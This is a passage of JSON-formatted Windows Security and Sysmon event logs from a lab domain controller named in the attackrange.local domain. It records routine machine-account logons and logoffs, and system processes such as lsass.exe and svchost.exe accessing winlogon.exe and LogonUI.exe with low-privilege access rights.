GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4ad02","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220394,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AD02\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ad02","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220395,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AAB1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4aab1","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.125\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.125","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+7c8b|c:\\windows\\system32\\lsm.dll+396a|c:\\windows\\system32\\SYSNTFY.dll+1fc3|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+598d8|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 